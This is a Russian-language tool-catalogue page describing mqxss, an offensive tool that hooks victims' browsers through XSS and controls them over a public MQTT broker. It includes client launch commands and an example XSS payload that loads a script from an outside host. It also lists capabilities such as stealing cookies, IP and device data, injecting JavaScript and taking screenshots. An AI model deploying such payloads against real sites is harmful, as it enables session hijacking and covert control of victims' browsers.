Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
mqxss — Связь с захваченным браузером через MQTT | Kitploit
Инструменты/GitHubGitHub/grampae/mqxss
Генерация полезной нагрузкиЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеКомандование и УправлениеRed TeamingИнструмент Удаленного Доступа
GitHubgrampae/mqxss

mqxss

Связь с захваченным браузером через MQTT

Репозиторий
82 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

mqxss v0.2

mqxss выступает в качестве клиента для взаимодействия с перехваченными браузерами через MQTT

Screenshot from 2023-07-03 15-15-35

Преимущество использования этого инструмента по сравнению с beef или xsshunter в том, что помимо размещения JS-пейлоада не требуется настраивать инфраструктуру — можно использовать публичный брокер (однако в настоящее время применяется обфускация, шифрование в разработке).

Перехваченные браузеры будут общаться в MQTT-топике на указанном вами брокере. Для тестирования доступно множество публичных/бесплатных брокеров.

Клиент использует библиотеку python paho.mqtt, а JS-пейлоад использует 'mqttws31.min.js', который загружается отсюда: 'https://cdnjs.cloudflare.com/ajax/libs/paho-mqtt/1.0.1/mqttws31.min.js'.


Инструкции

Screenshot from 2024-01-17 11-34-59

Чтобы сгенерировать JS-пейлоад для перехвата браузеров, укажите флаг -g при запуске вместе с переменными вашего брокера, порта и топика. Это создаст ваш пейлоад в папке /js/.

Чтобы запустить клиент, укажите ваш брокер, порт и топик следующим образом:

mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname

Чтобы запустить клиент с учетными данными, укажите ваш брокер, порт, имя пользователя, пароль и топик следующим образом:

mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname -u username -pw password

Отправьте ваш XSS-пейлоад жертве, пока запущен клиент mqxss, например: '"><script src=https://example.com/x.js async></script> или что-то подобное. Если сайт уязвим, вы должны получить уведомление о том, что браузер подключился, с некоторыми базовыми данными, включая cookie и т.д.

a


Возможности:

  • JS-пейлоад использует MQTT QoS 1 и Last Will; mqxss будет уведомлен об отключениях или подключениях, произошедших, пока клиент не был подключен к брокеру
  • генерация JS-пейлоада во время выполнения для перехвата браузеров
  • в настоящее время работает только с MQTT-брокерами, использующими защищенные веб-сокеты
  • открытие местоположения перехваченного браузера с захваченными cookie в браузере для удобства
  • при перехвате получает cookie, IP, тип устройства, user agent
  • просмотр ранее перехваченных (отключенных) браузеров
  • отправка JS в текущие перехваченные браузеры и получение ответа, если он доступен
  • скриншот перехваченного браузера
  • задание пользователя и пароля для брокеров, которым это требуется, во время выполнения
  • уведомление Pushover путем установки переменных ptoken и userkey в mqxss.py, а затем использования флага командной строки -po
Скачать инструмент